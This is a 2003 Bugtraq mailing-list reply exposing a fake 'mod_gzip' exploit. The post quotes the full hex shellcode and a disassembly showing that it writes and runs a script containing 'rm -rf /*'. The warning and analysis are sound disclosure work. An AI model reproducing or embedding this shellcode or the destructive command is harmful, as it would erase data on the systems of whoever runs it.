 
Date: Sun, 23 Nov 2003 12:52:16 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Re: m00-mod_gzip.c


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

d4rkgr3y wrote:
> /* m00-mod_gzip.c

Do NOT run it: this is a fake exploit whose "shellcode" actually runs rm -rf /:

> char default_shellcode[] =
> "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
> "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
> "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
> "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
> "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
> "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
> "\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
> "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";

0x0804a5a0 <default_shellcode+0>:       xor    %eax,%eax
0x0804a5a2 <default_shellcode+2>:       push   %eax
0x0804a5a3 <default_shellcode+3>:       push   $0x6e69622f
0x0804a5a8 <default_shellcode+8>:       mov    %esp,%ebx
0x0804a5aa <default_shellcode+10>:      mov    $0xc,%al
0x0804a5ac <default_shellcode+12>:      int    $0x80  -> chdir("/bin")
0x0804a5ae <default_shellcode+14>:      xor    %eax,%eax
0x0804a5b0 <default_shellcode+16>:      push   %eax
0x0804a5b1 <default_shellcode+17>:      push   $0x7a7a7a7a
0x0804a5b6 <default_shellcode+22>:      mov    %esp,%ebx
0x0804a5b8 <default_shellcode+24>:      push   $0x41
0x0804a5ba <default_shellcode+26>:      pop    %ecx
0x0804a5bb <default_shellcode+27>:      mov    $0x5,%al
0x0804a5bd <default_shellcode+29>:      int    $0x80  -> open("zzzz", 0x41)
0x0804a5bf <default_shellcode+31>:      xor    %ecx,%ecx
0x0804a5c1 <default_shellcode+33>:      push   %ecx
0x0804a5c2 <default_shellcode+34>:      push   $0x26202a2f
0x0804a5c7 <default_shellcode+39>:      push   $0x2066722d
0x0804a5cc <default_shellcode+44>:      push   $0x206d720a
0x0804a5d1 <default_shellcode+49>:      push   $0x6c6c696b
0x0804a5d6 <default_shellcode+54>:      push   $0x20662d20
0x0804a5db <default_shellcode+59>:      push   $0x6d720a68
0x0804a5e0 <default_shellcode+64>:      push   $0x732f6e69
0x0804a5e5 <default_shellcode+69>:      push   $0x622f2123
0x0804a5ea <default_shellcode+74>:      mov    %esp,%ecx
0x0804a5ec <default_shellcode+76>:      mov    %eax,%ebx
0x0804a5ee <default_shellcode+78>:      mov    $0x20,%dl
0x0804a5f0 <default_shellcode+80>:      mov    $0x4,%al
0x0804a5f2 <default_shellcode+82>:      int    $0x80  -> write(fd, "#!/bin/sh\nrm -f kill\nrm -rf /* &", 0x20);
0x0804a5f4 <default_shellcode+84>:      mov    $0x6,%al
0x0804a5f6 <default_shellcode+86>:      int    $0x80  -> close(fd)
0x0804a5f8 <default_shellcode+88>:      xor    %eax,%eax
0x0804a5fa <default_shellcode+90>:      push   %eax
0x0804a5fb <default_shellcode+91>:      push   $0x7a7a7a7a
0x0804a600 <default_shellcode+96>:      mov    %esp,%ebx
0x0804a602 <default_shellcode+98>:      mov    $0x1ed,%cx
0x0804a606 <default_shellcode+102>:     mov    $0xf,%al
0x0804a608 <default_shellcode+104>:     int    $0x80  -> chmod("zzzz", 0755)
0x0804a60a <default_shellcode+106>:     xor    %eax,%eax
0x0804a60c <default_shellcode+108>:     xor    %edx,%edx
0x0804a60e <default_shellcode+110>:     push   %eax
0x0804a60f <default_shellcode+111>:     push   $0x7a7a7a7a
0x0804a614 <default_shellcode+116>:     push   $0x2f2f2f2e
0x0804a619 <default_shellcode+121>:     mov    %esp,%ebx
0x0804a61b <default_shellcode+123>:     push   %eax
0x0804a61c <default_shellcode+124>:     push   %ebx
0x0804a61d <default_shellcode+125>:     mov    %esp,%ecx
0x0804a61f <default_shellcode+127>:     mov    $0xb,%al
0x0804a621 <default_shellcode+129>:     int    $0x80  -> execve("/bin/zzzz", "/bin/zzzz", 0)
0x0804a623 <default_shellcode+131>:     xor    %eax,%eax
0x0804a625 <default_shellcode+133>:     inc    %eax
0x0804a626 <default_shellcode+134>:     int    $0x80  -> exit()
0x0804a628 <default_shellcode+136>:     add    %al,(%eax)
0x0804a62a <default_shellcode+138>:     add    %al,(%eax)
0x0804a62c <default_shellcode+140>:     add    %al,(%eax)
0x0804a62e <default_shellcode+142>:     add    %al,(%eax)
0x0804a630 <default_shellcode+144>:     add    %al,(%eax)
0x0804a632 <default_shellcode+146>:     add    %al,(%eax)
0x0804a634 <default_shellcode+148>:     add    %al,(%eax)
0x0804a636 <default_shellcode+150>:     add    %al,(%eax)
0x0804a638 <default_shellcode+152>:     add    %al,(%eax)
0x0804a63a <default_shellcode+154>:     add    %al,(%eax)
0x0804a63c <default_shellcode+156>:     add    %al,(%eax)
0x0804a63e <default_shellcode+158>:     add    %al,(%eax)

[...]
> 	(long) range=default_shellcode;
> 	range();
[...]

- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* Inet: przemyslaw@...sunek.com ** keyId: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE/wJ9vkxEnBiV4/K0RAldLAKDam66ZCmIiqoGUn3eqpp25ucyVXgCgvSRS
9bc6c5pGkgncYeToNPsZeeM=
=jxIK
-----END PGP SIGNATURE-----


